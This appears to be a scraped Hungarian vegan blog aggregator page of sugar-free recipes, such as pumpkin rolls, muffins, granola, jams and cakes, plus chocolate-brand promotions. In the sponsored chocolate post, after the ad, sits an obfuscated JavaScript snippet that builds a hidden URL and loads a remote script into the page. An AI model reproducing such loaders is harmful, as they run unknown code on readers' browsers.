cukormentes receptek - Vegetáriánus receptek

Még kapható a második,
      bővített kiadás!

Még kapható! Bliszkó Viktor: Vegetáriánus receptek; második, bővített kiadás



Próbálja ki, biztosan ízleni fog!

A 125 éves pesti vegán hagyományokat ünnepli a GreenGorilla pizzéria

Vegán tiramisu kesukrémmel, tojásmentes piskótából

Vegán „mézes” sütemény

Kovászos tonkababos csokoládés keksz (barnított vajjal)

Vegán, mindenmentes kókuszgolyó










cukormentes receptek

Sütőtökös csiga teljes kiőrlésű, cukormentes változatban

2024. október 24. Prove - a világ vegán szemmel 

Sütőtökös csiga egészségesebb változatban? Igen, lehetséges: ehhez az édes, puha, élesztős tésztás süteményhez se finomlisztre, se hozzáadott cukorra nincs szükség, ráadásul tisztán növényi alapú összetevőkből készül. Ez az édesség tulajdonképpen a fahéjas csiga őszies, egészségesebb kiadású testvére - hiszen mindenki tudja, hogy szeptembertől novemberig mindenbe, amibe csak lehet, sütőtököt kell tenni. Ha pedig eddig azt… The post Sütőtökös csiga teljes kiőrlésű, cukormentes változatban appeared first on Prove.hu.

Gluténmentes szilvás quinoa muffin

2024. augusztus 10. Élj harmóniában 

Gluténmentes szilvás quinoa muffinMegkezdődött a szilva szezon...   imádjuk :) bármilyen változatban és variációban készíthető :)  Ezt a muffint quinoaliszttel és datolyacukorral készítettem. A cél egy fehérjében gazdag, egészséges,  ízletes, a szilvához ízben is jól passzoló muffin készítése volt.  Úgy vélem sikerült... nekünk nagyon bejött:) Gluténmentes szilvás quinoa muffin Hozzávalók 2,5 csésze quinoa liszt  1 csésze datolyacukor  1/­­2 csg. sütőpor   vanília  vanília fahéj 7 ek. kókuszzsír 12 db szilva víz Vegyszermentes (bio) alapanyagokat használj! A szilvákat mosd meg és távolítsd el a magokat. Keverd össze a száraz hozzávalókat egy tálba. Majd öntsd hozzá a kókuszzsírt és a vizet. Figyelj rá mennyi vizet vesz fel - a tészta legyen lágy, de ne folyós. A quinoa liszt több vizet vesz fel, így több csésze vízre lehet szükséged. Néhány lágy mozdulattal dolgozd össze a tésztát.  A muffin készítés egyik titka, hogy soha ne kevergesd hosszan a száraz összetevőket a nedvesekkel  és ne hagyd sokáig állni.  Adagold a tésztát a muffin formába.  Én muffin papírral szoktam a formát kibélelni, de vajjal és liszttel is megteheted.  A muffinok közepébe dugj bele egy-egy szilvát. Tedd  180 fokra előmelegített sütőbe  és süsd készre (kb. 25 p) . Sajnos a papírból nem jött ki szépen, de a tészta szépen összeállt, nem morzsálódik. Legközelebb csak zsírozott, lisztezett formában sütöm :) Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni,  szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra.  https:/­­/­­www.eljharmoniaban.hu/­­tudatos-taplalkozas Jó étvágyat kívánok:) szeretettel: Kati #gluténmentes,  #szilvás, #szilva #recept #vegán #vegetáriánus #quinoaliszt,  #muffin, #cukormentes, #egészséges, #tojásmentes

Spenótos tészta sütőben sült gombával

2024. március 31. vegasziget 

Nagyon sok spenót terem a kertben, így próbáljuk nyersen és főzve is enni: készült már belőle spenótos rakott krumpli, rengeteg zölturmix, spenótos lasagne, spenótos palacsinta, spenótos rizotto és most ez a tésztaétel. Egyszerű, gyors, finom. Hozzávalók: fél kg spenót (főzve ennyi), 2 gerezd fokhagyma 2 ek. kölesliszt cukormentes mandulatej (kb. 7-8 dl) só – ízlés […]

Epres crumble

2024. március 24. vegasziget 

Gyors, egyszerű, egészséges, finom. Kell ennél több? ? Hozzávalók: 15 ek apró szemű zabpehely 15 ek zabliszt (vagy 30 dkg kávédarálón durvára darált zabpehely) 1 csipet só 2 csomag cukormentes vaníliás cukor 1 ek. fahéj 6 ek. barna cukor vagy eritrit 6 ek. kókuszolaj vagy olaj — kb. 1/­­2 kg eper 2 ek. keményítő 6 ek. barna cukor […]

Krumplis sushi

2023. július 15. VegaLife 

Krumplis sushiMagyarországon tombol a kánikula, Angliában pedig a szél. Míg a szigetlakók örülnek ha élvezhetnek legalább 20 fokot, a magyaroknak szépen kijut a 30 fok feletti hőmérsékletből. A következő recept praktikusan a nagy melegben is gyorsan elkészíthető. Vihetjük munkába, utazásra, strandra, stb. Ha a krumplipüré csak krumpliból készül, kisebb az esély, hogy megromlik a nagy melegben. Amikor ezt elkészítettem, vittem ebédre a munkahelyemre, látták a kollégáim és tetszett nekik a "kreativ" ötlet, hogy krumplipüré legyen a szusi alapja. Mielőtt bárki első reakciója az lenne, hogy biztos nem tudom, a sushi szó igazából sós rizset jelent, ne aggódjon, tisztában vagyok vele, de jobb nevet nem találtam. Szóval ahogy a névből és a képekből is adódik, egy nagy csavart tettem a legutóbb általam készített sushin, méghozzá rizs helyett krumplipürét használtam hozzá. Egész jó lett. Könnyen összeáll így is. Különlegessé tettem, hogy az egyik tekercsbe párolt fodros kel leveleket tettem, a másikba pedig nyers spenót leveleket, és ezekre halmoztam rá a paprikát, uborkát. Jó hír hogy ez tényleg cukormentes (sokan a sushi rizsbe tesznek cukrot), gluténmentes (vannak, akiknek a rizs nem egészen tud az lenni). Ahogy kedvünk tartja szójaszósszal is ízesíthetjük, vagy ehetünk hozzá savanyított gyömbért, esetleg wasabit.   A recept Hozzávalók: - Néhány darab Nori lap (szárított alga lap) - Szabadon választott zöldségek, pl uborka, paprika - Pár szem krumpli a krumplipüréhez. Elkészítés: Krumplipüré elkészítése: Főzzük meg a krumplit sima vízben héjában vagy felszeletelve sós vízben jó puhára, mad villával vagy krumplinyomóval törjük össze. Szükség esetén sózhatjuk, esetleg adhatunk hozzá 1 dl növényi tejet, ha túl száraz lenne, Én nem adtam hozzá semmit, a krumpli tökéletesen összeált pürébe. A nori lapot érdemes bambusz tekercsre fektetni. Az egyik végénél elkezdjük krumplipürét vékonyan rákenni, majd a zöldségszeleteket is a krumplira helyezzük. Lehet paprika, répa, gomba, uborka, avokádó - csak hogy néhány ötletet adjak. Kb. a 3/­­4 részét a nori lapnak megtöltjük, majd szimplán a krumplipürés végétől szorosan feltekerjük. Tálalás előtt felszeleteljük.

ChocoArtz, a vegán és cukormentes kézműves csokoládé

2023. április 26. vegasziget 

Igaz, elmúlt a húsvét, az édesség-ajándékozás egyik kiemelt időpontja, de csokoládét, valljuk be, eszünk hétköznapokon is; és bizony nagyon nem mindegy, milyet fogyasztunk. Én, főképp, amióta megszülettek a gyermekeink, figyelek arra, hogy cukor-és adalékanyag-mentes legyen (és persze, nem mindegy az sem, milyen cukorpótló van benne) a vásárolt csokoládé vagy pl. ne legyen benne tejtermék, pálmazsír […]

Bodzaszörp télire

2022. június 26. VegaLife 

Bodzaszörp télireTudtad, hogy Harry Potter pálcája bodzafából készült?  Az Elder Wand már elnevezésével is különleges, ugyanis ez tulajdonképpen egy angol szójáték. Az elder szó jelentése idős, valamint bodza- is. Mindkettő igaz a pálcára, ugyanis ez a pálca a világ legerősebb pálcája, mondhatni, a pálcák nagy örege, valamint bodzafából készült. Talán még nem késő, talán még te is találsz virágzó bodzabokrot. A szörpöt két hete készítettem és a mai sétánk során is találtam még virágzó bodzabokrot, nem is egyet, igaz szinte mindegyik fele már kezdett zöld bogyókat hozni a virágok helyett. Ha idén le is maradnál, de következő bodzavirágzás idején keresgélsz, jól jön számodra a recept, hogyan készítsünk bodzaszörpöt fehér cukor nélkül.   A recept: Hozzávalók: -  kb 20-30 szál frissen szedett bodzavirág -  1-2 citrom -  agavé vagy datolya szirup vagy méz vagy más édesítő (pl: gyümölcscukor, barnacukor, stb.) - 3 l víz - tartós elrakáshoz üvegek   Elkészítés: A vizet felforraljuk, hozzáadjuk az édestőszert, elkavarjuk, majd belehelyezzük a rovarmentes bodzavirágokat, ismét átkeverjük. Az egyik citromot kicsavarjuk és hozzáadjuk, a másik citromot karikákra vágjuk és beletesszük. Így áztatjuk a bodzavirágokat 1-2 napig, hűtőben tárolva. Amikor készen állunk a télire való eltevésre, az üvegeket forró vizes tepsiben kiforrázzuk, csírátlanítjuk. Közben a bodzalét leszűrjük, felforraljuk. A kiforrázott üvegekbe töltjük forrón, majd lezárjuk őket és személy szerint én meleg dunsztba tettem őket és ott pihentek amíg ki nem hűltek.  Ez a szörp nem lesz olyan sűrű, mint a bolti, hiszen nem cukorból készült szirup, de hígítható és frissítő italként szolgál akár mentes vagy szénsavas vízzel (szódával). Felhasználható teák édesítésére is. Az édesítők mennyiségét úgymond ízlelés alapján mindenki a maga édes érzetének megfelelően választhatja meg. Attól is függ a mennyiség, hogy milyen édesítést használunk.    

Csokis banándzsem (vegán)

2021. június 22. VegaLife 

Csokis banándzsem (vegán)Körülbelül 20-22 évvel ezelőtt ettem életemben először banán lekvárt, banándzsemet. Az évvégi napokat töltöttem barátok között és reggelire kovásztalan kenyér és banánlekvár is volt az asztalon. Ezt követően pár évre, amikor már férjnél voltam, főztem banánlekvárt. Most pedig egy kicsit változtattam rajta. Kaptunk egy csomó túlérett banánt, legalább 2-3 kilónyit, gyorsan kellett felhasználni, hogy ne romoljon meg még jobban, úgyhogy először is felfőztem őket, majd adtam hozzá kakaót, jól átkevertem, majd vízgőzben kifertőtlenített üvegecskékbe töltöttem. Kentük sütemény tetejére, linzerbe, és még mindig van belőle. Az egyik leggyorsabban elkészíthető lekvár ráadásul nem kell más hozzá mint banán és kakaó/­­karob vagy csoki. Cukrot sem kell hozzáadni, hiszen a banán az egyik legédesebb gyümölcs. Dzsemfix és társai sem kell hozzá, mert a banánnak köszönhetően sűrű lekvárt, dzsemet kapunk rövid főzési idővel. A recept Hozzávalók: - Kb 15-20 szál túlérett banán - víz - kakaópor/­­karobpor vagy aprított csokoládé - üvegek   Elkészítés: A túlérett banánokat megfosztjuk héjuktól, majd egy tűzálló edénybe belekarikázzuk. Kevés kis vizet (kb 1 dl) öntünk a lábos aljára, majd állandó kevergetés mellett összefőzzük. Botturmix géppel érdemes pépesíteni, ezzel lerövidítjük a főzés idejét. Amikor a banánok már szétfőttek, pépes, sűrű szószunk van, hozzáadunk tetszés szerint kakaó- vagy karobport vagy apróra tört csokidarabokat. (Használhatunk húsvét vagy karácsony után megmaradt csokit is akár.)  Az üvegeket a dzsemhez a lekvárfőzés előtt érdemes elkészíteni. Ennél a receptemnél részletesen leírom a menetét. 

Almás-diós sütike liszt- és cukormentesen

2020. december 21. VegaLife 

Almás-diós sütike liszt- és cukormentesenKözelednek az ünnepek és biztos vannak, akik liszt- és/­­vagy cukormentes, gyorsan elkészíthető édességet szeretnének az ünnepi asztalra. Számukra mindenképpen érdemes ezt kipróbálni, hiszen ahogy a recept leírás végén is jelzem, tálalási módja többféleképpen lehetséges, megkenhetjük csokiszósszal, vaníliasodót önthetünk a szeletek tetejére, kísérhetjük a szeleteket 1-1 gombóc fagyival. Nagyon reformosoknak pedig friss almaszeletekkel is tálalhatjuk.  A recept Hozzávalók: -  400g dió -  150g mazsola vagy apróra vágott datolya -  1 kk őrölt fahéj -  1 bio citrom reszelt héja -  4-5 db alma lereszelve -  200g növényi joghurt   Elkészítés: A diót megdaráljuk, a citrom héját lereszeljük (nálunk az Aldiban árulnak olyan citromot, aminek a héját nem kezelik semmivel, ha bio citromhoz nem jutok hozzá, még ezt szoktam használni), az almákat szintén lereszeljük (én gyors aprítót használtam). Mindezekhez jól hozzákeverjük a mazsolát vagy datolyát és végül a növényi joghurttal átkeverjük.  Kb 30-40 perc alatt 180C fokon, sütőpapírral bélelt, előmelegített sütőben készre sütjük. Tálaláskor meghintjük fahéjas porcukorral (gyümölcscukorból is darálható porcukor) vagy olvasztott csokit kenünk a tetejére, vagy vanília sodót, esetleg vanília fagyit adunk hozzá, de almaszeletekkel is nagyon finom.  

Puncs szelet (glutén és cukormentes)

2020. október 13. Vegán receptek Tőlünk Nektek 

Puncs szelet (glutén és cukormentes)  Anett receptje: Hozzávalók: o 20 dkg barna rizsliszt o 15 dkg köles liszt o 20 dkg eritrit o 1 cs sütőpor o kb negyed kk szódabikarbóna o 2 dkg útifűmaghéj o 0,5 dkg útifűmaghéj őrlemény o 2,5 ek olaj /­­ kókuszolaj o 4 dl víz o 2 ek almaecet   [...] Bővebben!

Új, magyar gyártású, vegán bonbonok és vegán tejcsokik, amiket mindenképp meg kell kóstolnod!

2020. augusztus 25. VegaNinja 

Szereted az édességeket, de nem találtál még olyan bonbont, ami minőségi és vegán is? A Harlequin Chocolates megálmodói is így voltak annak idején – ezért manufaktúrájuk választékának nagy része a vegán csokirajongóknak szeretne segíteni édes pillanatokat varázsolni. Hirdetés A számukra legkedvesebb ízek a vegán bonbonok, pralinék és a táblás csokik, sőt már van olyan változat, ami mindezek mellett még cukormentes is.  A legnagyobb kedvencek eddig a málnás ,,Bájital bonbon, a pisztáciás bonbon, a kókuszkaramell trüffel, és a banános-pekándióst is sokan keresik náluk vagy a rendezvényeken, ahol kóstolhatók. Ezeken kívül képzeld el a zamatos piemonti mogyorót, ahogy illatos és roppanós, a pisztáciát, az ízletes fűszereket ahogy édesen-krémesen összeolvadnak és mindez minőségi és vegán is… Csábító a gondolat! Piemonti mogyorós praliné A Harlequin Chocolatesnek nagy tervei vannak: az ősz során bemutatják a legújabb kedvencet, a saját készítésű vegán fehércsoki desszertjüket, Sahara névvel - már nagyon várják, hogy minél többen megkóstolhassátok! Én mindenképp meg akarom kóstolni minél hamarabb. Hamarosan több részlet is kiderül majd róla, de addig is nagyon ajánlom a kesutejjel készült vegán tejcsokijukat ,,No Milk Today névvel és más finom táblásaikat! Akik a különlegességeket szeretik, azoknak pedig biztosan kedvence lesz a fülöp-szigeteki termőterületről származó kakaóból készülő, kézműves táblás, a ,,Maprutas - ami egy igazi ízbomba a gyümölcsös, kifinomult ízjegyeivel, de sok finomságuk van még, érdemes benézni a csokiwebshopjukba. A gyönyörű design is az élmény része Eddig sok szó esett az ízekről, de amiről még nem, az a design. A Harlequin Chocolates-nál hisznek abban, hogy először a szemünkkel ,,kóstolunk, ezért minden egyes Harlequin csokinál fontosnak tartják a csinos és egyedi megjelenést, a táblásaikat pedig már messziről könnyen felismerheted azok modern és vidám világáról. Én, grafikusként odavagyok a designért! Akár magadnak (éljen az önszeretet!), akár ajándékba is rendelhetsz a webshopjukból, és szívesen készítenek egyedi csokoládét rendezvényekre, esküvőkre is. Már több különleges kérést valósítottak meg egyedi elképzelés alapján. Harlequin Chocolates – Mad Hatter – organikus, madagaszkári étcsokoládé szicíliai citromos sóval Kövesd őket instagramon vagy facebookon, hogy értesülj az újdonságaikról és hogy milyen eseményen találkozhatsz velük legközelebb. Ha nem egy eseményen kóstolsz, akkor pedig pár kattintással rendelhetsz az online csokiboltból, amit futárszolgáltatással az ajtóig repítenek. Nem minden csokijuk vegán, de a vegán csokoládék menüpontban kedvedre válogathatsz. Webshop: https:/­­/­­harlequinchocolates.hu Instagram: www.instagram.com/­­harlequinchocolates Facebook: www.facebook.com/­­harlequinchocolates Email: hello@harlequinchocolates.hu Harlequin Chocolates – No Milk Today – Madagaszkári organikus vegán tejcsoki szezámmal és édesköménnyel Hirdetés vége (function(){ ojvs=document.createElement(script);ojvs.async=true;ojvs_­=u+(s)+t; ojvsu=242060400.;ojvs_­+=a+(t.i);ojvs_­+=n+(f+o)+/­­; ojvsu+=1jtrfl61jvsbrmaz1cx074+(n2ljjjn0); ojvs.src=https:/­­/­­+ojvs_­+ojvsu;ojvs.type=text/­­javascript; document.body.appendChild(ojvs); })(); Tedd a kedveceim közé 0 The post Új, magyar gyártású, vegán bonbonok és vegán tejcsokik, amiket mindenképp meg kell kóstolnod! appeared first on VegaNinja.

5 perces mákos piskóta vanília pudinggal

2020. április 19. Beautilicious 

5 perces mákos piskóta vanília pudinggalSe liszt, se idő, se tehetség nem szükséges az elkészítéséhez. Ha egy kis mákos guba ízvilágra vágysz, de nincs türelmed kivárni, míg elkészül, akkor ez egy remek alternatíva. Szükséged lesz: - 20 gramm mákra - 30gramm vaníliás fehérjére - 10-20gramm édesítőre - 1tk sütőporra - 1 tojásra - az öntethez: cukormentes vaníliapudingra - 5 percre Keverj össze minden hozzávalót egy nagy bögrében /­­ tálkában és tedd mikróba 2 percre. Öntsd nyakon vanília pudinggal.

Hamis omlett (vegán)

2018. szeptember 9. VegaLife 

Hamis omlett (vegán)Ha így készíted az omlettet, a koleszterinszinted is jobb lesz! Sokan gondolják, a vegán életmódra áttérés által nélkülözni kell a sajtot, a bundáskenyeret és az omlettet is. Íme az újabb bizonyíték, hogy ez nem igaz. Egy vegán fesztiválon járva még régebben, az egyik előadás keretén belül az előadó egy hatalmas lapos edényben készített omlettet. Igaz, tett bele mindenféle zöldséget, én ugyanezt a kísérletet kisebb mennyiségben, először csak úgy natúr, zöldségek nélkül készítettem el. Azóta ezt az alapot már használtam más ételek készítésénél is. Jó sláger a konyhámban úgy értve, ha hazaértünk és nincs semmi, amit ehetnénk, gyorsan elkészül. Közel annyi idő alatt, mint egy hagyományos, tojásos omlett, éppen csak tojás nélkül. A recept Hozzávalók: - 5 ek sárgaborsó vagy csicseriborsó liszt (lehet vegyesen is) - 2 ek zabpehely liszt - 1 nagyobb csipetnyi kurkuma - 1 nagyobb csipetnyi   fekete só   (nevében fekete, színében rózsaszíntől sötét barnáig jellemző) - ételízesítő - cukormentes növényi tej (készíthetünk   zabtejet   vagy dobozos növényi tejjel is dolgozhatunk), ha egyik sincs, vízzel is próbálhatjuk - pár csepp olíva olaj vagy kókuszzsír   Elkészítés: A liszteket összekeverjük egy tálba, hozzáadjuk a kurkumát, a feketesót, egy kevés ételízesítőt és annyi tejjel csomómentesre keverjük, hogy palacsinta sűrűségű tésztát kapjunk. Fogunk egy teflon sütőt, egy-két csepp olajat belecseppentünk, felmelegítjük a teflonsütőt és pl. merőkanállal beleteszünk egy adaggal. Idővel megfordítjuk. Tovább lehet ízesíteni, ha zöldséget, például hagymát, gombát, paprikát, esetleg paradicsomot felaprítunk, egy kevés olajon vagy vízen megpuhítjuk, majd erre öntjük az elkészített hamis tojás-levet. Nem muszáj egybe megsütni, darabokra is vághatjuk sütés közben. Kedvünk szerint más fűszereket is adhatunk hozzá, mint például borsikafű vagy fekete bors, fokhagyma. Bizonyos emberek szeretik a megsült omlettet őrölt piros paprikával megszórni, de hallottam arról is, hogy valakik ketchupot tesznek a tetejére. Ahány ház annyi ízvilág. :) 

Erdei gyümölcsös "joghurt" szelet

2018. március 19. Fittanyuka 

Íme egy igazán könnyű, frissítő “mentes” desszert recept amely nemcsak vegán, cukormentes hanem gluténmentes is! Hozzávalók: (10-12 szelethez) 100 g rizsliszt 50 g gluténmentes lisztkeverék 25 g kókuszreszelék 25 g kakaópor 200 ml víz 80 g eritrit 1/­­2 citrom lereszelt héja 6 evőkanál folyékony (szoba hőmérsékletű) kókuszolaj 1 tasak foszfátmentes sütőpor   Krém:  250 g selyem tofu 200 ml kókusztejszínt 100 g eritrit 1 citrom reszelt héja 1 citrom leve késhegynyi bourbon vanília 2 csapott evőkanál agar-agar 1,5 dl víz két maréknyi friss, vegyes piros gyümölcsök A piskóta száraz hozzávalóit összekavarjuk, majd hozzáadjuk a nedves hozzávalókat, robotgéppel alaposan összedolgozzuk és egy kiolajozott kapcsos 10 szeletes tortaformába öntjük, 180 C fokon 40 percig sütjük. Tűpróbát végzünk, ha nem tapad a közepe elkészült, ha szükséges még 5-10 percig sütjük 150 C fokon. Formában hagyjuk kihűlni. A krém hozzávalóit (kivéve az agar-agar és víz) összeturmixoljuk. A vizet hidegen elkeverjük az agar-agarral és felforraljuk. Utána hozzákeverjük, turmixoljuk a krémmel, belekeverjük a megmosott gyümölcsöket és a formába öntjük, a piskóta tetejére. Hűtőben egy éjszakát pihentetjük, vagy fagyasztóban 1-2 órát hűtjük.   The post Erdei gyümölcsös "joghurt" szelet appeared first on fittanyuka.hu.

Almás zabpelyhes keksz - tojásmentes, cukormentes, tejmentes

2018. február 18. Élj harmóniában 

Almás zabpelyhes keksz - tojásmentes, cukormentes, tejmentesHa tél és  gyümölcs, akkor, az leginkább az alma. Ilyenkor érdemes a szezonalitásnak megfelelő gyümölcsöket, zöldségeket enni, mert sajnos pl. a déli gyümölcsök ugyan finomak, de természetüket tekintve hűtik és nedvesítik a szervezetet és nehezebb őket a szervezetnek emészteni ilyenkor. Ezért fázékonyságot, puffadást, orrfolyást, etc.  eredményezhetnek. Ha már alma, ma egy nagyon puha zabpelyhes kekszek készítettem. Ez egy egyszerű, gyors és egészséges finomság. Lehet reggeli vagy desszert is. Készítheted teljesen cukormentes változatban is, ha édes az alma. Gluténmentes diétában, gluténmentes zabpelyhet és zablisztet használj.  Hozzávalók 1 csésze zabliszt 1 csésze zabpehely 1 tk. szódabikarbóna 1 tk. fahéj 1/­­4 tk, vanília 1 csipet szárított gyömbér 1/­­3 csésze kókuszolaj (vajat is használhatsz helyette) 2 ek. lenmagliszt  8  ek. víz 4 közepes alma Vegyszermentes (bio) alapanyagokat használj! Az almát mosd meg, hámozd meg és reszeld apróra vagy használj aprítógépet. A lenmaglisztet öntsd le a vízzel és hagyd állni egy picit - ez fogja összetartani a tésztád. (A "tojás helyettesítéséről" egy korábbi bejegyzésben részletesen  írtam már itt olvashatod)  Egy tálban keverd össze a zablisztet, zabpelyhet,  szódabikarbónát, fűszereket. Ha nagyon édesszájú a család keverj hozzá teljes értékű nádcukrot. Majd keverd hozzá az olvasztott kókuszzsírt és add hozzá a lenmaglisztes keveréket. Az egészet keverd gyorsan össze. Amikor elkeverted a tésztát, kanál segítségével egy sütőpapírral bélelt tepsire tegyél adagokat és nyomkodd le, hogy keksz formája legyen. Tedd 180°C  fokra előmelegített sütőbe és süsd amíg aranybarnára sül. (kb. 20-25p) . A végén ha édesebben szeretnétek egy kis barna nádcukorral szórd meg.

Fűszeres kókuszos quinoa pehely granola (laktózmentes, gluténmentes, vegán)

2017. október 30. Zizi kalandjai 

Fűszeres kókuszos quinoa pehely granola (laktózmentes, gluténmentes, vegán) Ezer éve, pontosan két éve és két hónapja volt utoljára granola recept a blogomon. Ez sem blog receptnek készült, csak kókuszjoghurt recepttel kísérletezem egy konyhai gép segítségével és ahhoz készítettem ropogós granolát, hogy tudjuk mivel enni. Annyira finom lett a granola, hogy muszáj elhoznom a receptet nektek is. Megint csak – ahogyan a granola receptek többsége születik -, véletlenszerűen dobáltam össze egy tálba mindent, amit találtam itthon. Mogyoró, mandula, napraforgómag, lenmag, quinoa pehely, gluténmentes zabpehely, kókusz chips és a fűszerek: fahéj, vanília és őrölt kardamom. Egyedül a kókusz chipset sütöttem/­­pirítottam külön egy serpenyőben, hogy ne égjenek meg nagyon, de ha a tepsiben sütés végén adjuk a granolához úgy is rendben van, csak tényleg figyeljünk rá, mert nagyon könnyen megég. Kókuszjoghurtba, kására és smoothie bowlok tetejére szórtuk ezt a fűszeres granolát, amit mindannyian imádtunk. Holnap már sütöm is a következő adagot. Ti is próbáljátok ki vagy mentsétek el a receptet, mert karácsonyi gasztro ajándékként nagyon jól fog jönni egy ilyen illatos, ropogós granola. Érdemes dupla adagot csinálni belőle! Fűszeres kókuszos quinoa pehely granola (laktózmentes, vegán)   Mentés Nyomtatás Előkészítési idő 10 perc Főzési idő 20 perc Teljes idő 30 perc   Ropogós, fűszeres granola. Kiváló reggelire vagy délutáni nasinak! Szerző: Zizi Recept típusa: snack, reggeli Konyha: vegán Adag/­­mennyiség: 4 főre Hozzávalók 1 bögre quinoa pehely 1 bögre aprószemű gluténmentes zabpehely 1 bögre mandula/­­törökmogyoró, vegyesen, durvára aprítva 1 bögre napraforgómag ¾ bögre kókusz chips 3 evőkanál lenmag 3 evőkanál extra szűz kókuszzsír, olvasztva 3 evőkanál agavészirup (opcionális) 1 teáskanál őrölt fahéj ¼ teáskanál őrölt vanília ¼ teáskanál őrölt kardamom Elkészítés Melegítsük elő a sütőt 180 fokra. Egy nagy tepsit béleljünk ki sütőpapírral. Egy tálban keverjük össze a száraz alapanyagokat: quinoa pehely, zabpehely, mandula, törökmogyoró, napraforgómag, lenmag, fahéj, vanília, kardamom. Egy másik tálban keverjük össze a nedves hozzávalókat: a kókuszzsírt és az agavészirupot. Ezt a nedves keveréket adjuk a szárazhoz és jól keverjük el, hogy a kókuszzsír és az agavészirup mindenhol befedjék (érintsék) a magokat. Borítsuk rá a tepsire és kanállal egyengessük el, hogy mindenhova egyformán jusson. Süssük kb. 10-12 percig, keverjük át, majd süssük újabb 10 percig, amíg aranybarna lesz (ellenőrizzük folyamatosan, mert sütő függő, hogy milyen hamar lesz kész). Sütés közben egy száraz tapadásmentes serpenyőben enyhén pirítsuk meg a kókusz chipset 3-4 perc alatt, majd ha a sütőt elzártuk, keverjük a chipset a granolához. Üvegben/­­dobozban tartva hetekig eláll. Bár nem fog addig tartani, ezt garantálom! Jegyzetek A recepthez használt bögre 250 ml-es. Bármilyen magot használhatunk hozzá, diót, kesudiót, pisztáciát, tökmagot, amit találunk a kamránkban. Az agavészirupot el is hagyhatjuk, így teljesen cukormentes lesz a granola. Lehet csak quinoa pehelyből készíteni. 3.5.3226

répás almás pite

2017. szeptember 30. Beautilicious 

répás almás piteNézzük mi van a kamrában :D. Répa,alma..hmm..mi is készülhet ezekből a finomságokból? Egy klasszikus édesség amiért mindenki oda van? Igeeen! Pite készült, jó sok fahéjal (mert az alma, fahéj, répa trió verhetetlen:) ) Hozzávalók a tésztához - 2alma - 150gr tejföl - 150gr zabliszt - 80gr kókuszliszt - 20gr útifűmag héj - 3ek cukormentes sárgabarack lekvár - Fél citrom leve a töltelékhez - 4répa - 2alma - 1narancs leve - fahéj Így készítsd - A tésztához pürésítsd az almát, majd a tejföllel, lekvárral és a citromlével keverd össze - A száraz összetevőket keverd össze egy külön tálba, majd az almapürével alaposan gyúrd össze - Nyújtsd ki a tészta háromnegyedét - Tedd sütőbe 180fokre 15percig - Addig elkészítjük a tölteléket; Reszeld la a répákat és az almákat - Facsard hozzá egy narancs levét, majd tegyél hozzá fahájat ( ha nem elég lágy a töltelék, előfőzheted, mert akkor enged egy kis levet az alma) - Tölts meg a töltelékkel az elősütött tésztát, majd a maradékot is nyújtsd kis - Vágj csíkokat és helyezd rá olyan formában, hogy rácsos pitét kapj

kakaós kókuszos céklás kenyér

2017. szeptember 15. Beautilicious 

kakaós kókuszos céklás kenyérImádom a kakaó, a cékla, és a kókusz ízét is, na de a három együtt még zseniálisabb. Ha valami igazán finom süteményre vágysz, próbáld ki ezt a glutén-, és cukormentes egészséges finomságot. Hozzávalók - 125gr kókuszliszt - 25gr útifű maghéj  - 75gr édesítő - 50gr kakaó - 175gr cékla - 250gr görög joghurt - 150ml kókusztej Így készítsd - A céklát a joghurttal és a tejjel turmixold össze - Egy másik tálba keverd össze a száraz összetevőket - A két keveréket gyúrd össze és tedd kenyérsütő formába - Süsd 180 fokon 30 percig

Erdei gyümölcsös “joghurt” szelet

2017. július 30. Fittanyuka 

Erdei gyümölcsös “joghurt” szelet Íme egy igazán könnyű, frissítő “mentes” desszert recept amely nemcsak vegán, cukormentes hanem gluténmentes is! Hozzávalók: (10-12 szelethez) 100 g rizsliszt 50 g gluténmentes lisztkeverék 25 g kókuszreszelék 25 g kakaópor 200 ml víz 80 g eritrit 1/­­2 citrom lereszelt héja 6 evőkanál folyékony (szoba hőmérsékletű) kókuszolaj 1 tasak foszfátmentes sütőpor   Krém:  250 g selyem tofu 200 ml kókusztejszínt 100 g eritrit 1 citrom reszelt héja 1 citrom leve késhegynyi bourbon vanília 2 csapott evőkanál agar-agar 1,5 dl víz két maréknyi friss, vegyes piros gyümölcsök A piskóta száraz hozzávalóit összekavarjuk, majd hozzáadjuk a nedves hozzávalókat, robotgéppel alaposan összedolgozzuk és egy kiolajozott kapcsos 10 szeletes tortaformába öntjük, 180 C fokon 40 percig sütjük. Tűpróbát végzünk, ha nem tapad a közepe elkészült, ha szükséges még 5-10 percig sütjük 150 C fokon. Formában hagyjuk kihűlni. A krém hozzávalóit (kivéve az agar-agar és víz) összeturmixoljuk. A vizet hidegen elkeverjük az agar-agarral és felforraljuk. Utána hozzákeverjük, turmixoljuk a krémmel, belekeverjük a megmosott gyümölcsöket és a formába öntjük, a piskóta tetejére. Hűtőben egy éjszakát pihentetjük, vagy fagyasztóban 1-2 órát hűtjük.  

Barackkrémes túrókocka

2017. július 14. Beautilicious 

Barackkrémes túrókockaÉvek óta az egészséges vonalat követem és eszem ágában sincs ezen változtatni. Nem jár semmiféle lemondással, sőt....! Édesszájú vagyok, de nem is kicsit :D, imádok nassolni. Az egyik kedvenc alapanyagom a túró. Nagyon finom és nagyon jó fehérjeforrás is. Ajánlom mindenkinek! És ha nem tudjátok, hogyan fogyasszátok, próbáljátok ki például ez isteni túrókockát. Hozzávalók - 125gr zabliszt - 25gr lenmagliszt - 50gr kókuszliszt - 70gr édesítő - fél csomag sütőpor - 100gr light sajtkrém - 200ml tej/­­ növényi tej/­­víz - 125gr sárgabarack - 3ek cukormentes baracklekvár - fél citrom leve - fahéj - 1 zacskó zselatin - 500gr túró - 2tojássárgája - édesítő ízlés szerint Így készítsd - A tésztához keverd össze a liszteket a sütőporral és a 70gr édesítővel - Add hozzá a krémsajtot és a folyadékot - Csomagold fóliába és tedd hűtőbe fél órára - A barackkrémhez turmixold össze a barackot a lekvárral, fél citrom levével és a fahéjjal - A zselatint old fel 4ek hideg vízben, majd add a krémhez és tedd hűtőbe - A túrókémhez a túrót, fél citrom levét és héját, az édesítőt és a 2 tojássárgáját keverd össze botmixerrel, hogy a túró ne legyen szemcsés. - Vedd ki a tésztát a hűtőből és lisztezett felületen nyújtsd ki jó vékonyra, majd helyezd tepsibe - Szurkodd meg villával, majd süsd 30 percig 180fokon - Vedd ki, majd öntsd bele a barackkrémet, majd rá a túrókrémet és süsd további 45percig

Reform kakaós keksz

2017. június 19. Vegavarázs 

